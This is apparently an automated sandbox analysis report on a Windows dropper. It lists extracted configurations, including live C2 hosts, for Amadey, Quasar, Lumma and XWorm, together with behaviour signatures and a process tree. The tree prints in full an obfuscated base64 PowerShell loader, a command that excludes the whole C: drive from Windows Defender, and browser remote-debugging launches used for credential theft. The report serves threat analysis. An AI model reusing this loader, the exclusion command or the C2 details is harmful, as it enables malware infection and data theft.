Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/04/2025, 05:59

General

  • Target

    random.exe

  • Size

    1.8MB

  • MD5

    0648029f0eb1caba6fe73371623519ac

  • SHA1

    7163dd0c176ae453bbb974c983d1915a67b1b30c

  • SHA256

    5cf7751ea33057a39a353f34da5527940ef4a44a90262697b2ee7186b6d40749

  • SHA512

    1e49122cc07fe35ea6bc7b07a85c98c682fef8bb8f2195a6b4e2f32218fec59ed25117c8b109ad07dbbe088e233b08cafbfa164c2365756dd009acf18f6cf690

  • SSDEEP

    49152:ufWVASkwgczDzXciEqrZkRHbddTxCE+tpTmpgCH/GJ/u:XAHTAzXzu7dFxepTKgCS

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://advennture.top/GKsiio

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:9000

45.134.39.20:9000

Mutex

oV8zKY7m1pKloRzQ

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 1 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 19 IoCs
  • Uses browser remote debugging 2 TTPs 23 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 47 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 47 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 17 IoCs
  • Drops file in Windows directory 15 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 12 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of FindShellTrayWindow 61 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3464
      • C:\Users\Admin\AppData\Local\Temp\random.exe
        "C:\Users\Admin\AppData\Local\Temp\random.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:4636
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1168
          • C:\Users\Admin\AppData\Local\Temp\10460870101\RYZusWg.exe
            "C:\Users\Admin\AppData\Local\Temp\10460870101\RYZusWg.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:3492
          • C:\Users\Admin\AppData\Local\Temp\10462640101\LJl8AAr.exe
            "C:\Users\Admin\AppData\Local\Temp\10462640101\LJl8AAr.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:6700
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              5⤵
                PID:6740
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:6748
            • C:\Users\Admin\AppData\Local\Temp\10462700101\n0hEgR9.exe
              "C:\Users\Admin\AppData\Local\Temp\10462700101\n0hEgR9.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:5496
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4284
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10464271121\ccosvAs.cmd"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5656
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10464271121\ccosvAs.cmd"
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4988
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Drops startup file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: AddClipboardFormatListener
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:5880
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:620
            • C:\Users\Admin\AppData\Local\Temp\10465960101\amnew.exe
              "C:\Users\Admin\AppData\Local\Temp\10465960101\amnew.exe"
              4⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2904
              • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                5⤵
                • Downloads MZ/PE file
                • Checks computer location settings
                • Executes dropped EXE
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:6208
                • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                  "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:4200
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                      PID:2436
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      7⤵
                      • Downloads MZ/PE file
                      • System Location Discovery: System Language Discovery
                      • Checks processor information in registry
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5216
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                        8⤵
                        • Uses browser remote debugging
                        • Checks processor information in registry
                        • Enumerates system info in registry
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        PID:6776
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffebc8adcf8,0x7ffebc8add04,0x7ffebc8add10
                          9⤵
                            PID:6824
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1980,i,13037584219854030272,14997705901478578594,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1976 /prefetch:2
                            9⤵
                              PID:7052
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1532,i,13037584219854030272,14997705901478578594,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1648 /prefetch:3
                              9⤵
                                PID:6904
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2356,i,13037584219854030272,14997705901478578594,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2624 /prefetch:8
                                9⤵
                                  PID:7120
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3244,i,13037584219854030272,14997705901478578594,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3280 /prefetch:1
                                  9⤵
                                  • Uses browser remote debugging
                                  PID:5244
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,13037584219854030272,14997705901478578594,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3328 /prefetch:1
                                  9⤵
                                  • Uses browser remote debugging
                                  PID:4464
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4272,i,13037584219854030272,14997705901478578594,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4268 /prefetch:2
                                  9⤵
                                  • Uses browser remote debugging
                                  PID:5916
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4640,i,13037584219854030272,14997705901478578594,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4632 /prefetch:1
                                  9⤵
                                  • Uses browser remote debugging
                                  PID:5648
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5196,i,13037584219854030272,14997705901478578594,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5180 /prefetch:8
                                  9⤵
                                    PID:2580
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                  8⤵
                                  • Uses browser remote debugging
                                  • Enumerates system info in registry
                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                  • Suspicious use of FindShellTrayWindow
                                  PID:6852
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x268,0x7ffebb5af208,0x7ffebb5af214,0x7ffebb5af220
                                    9⤵
                                      PID:3968
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1916,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=2308 /prefetch:3
                                      9⤵
                                        PID:6164
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2264,i,16753435351167706972,6205088520470684982,262144 --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:2
                                        9⤵
                                          PID:5152
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
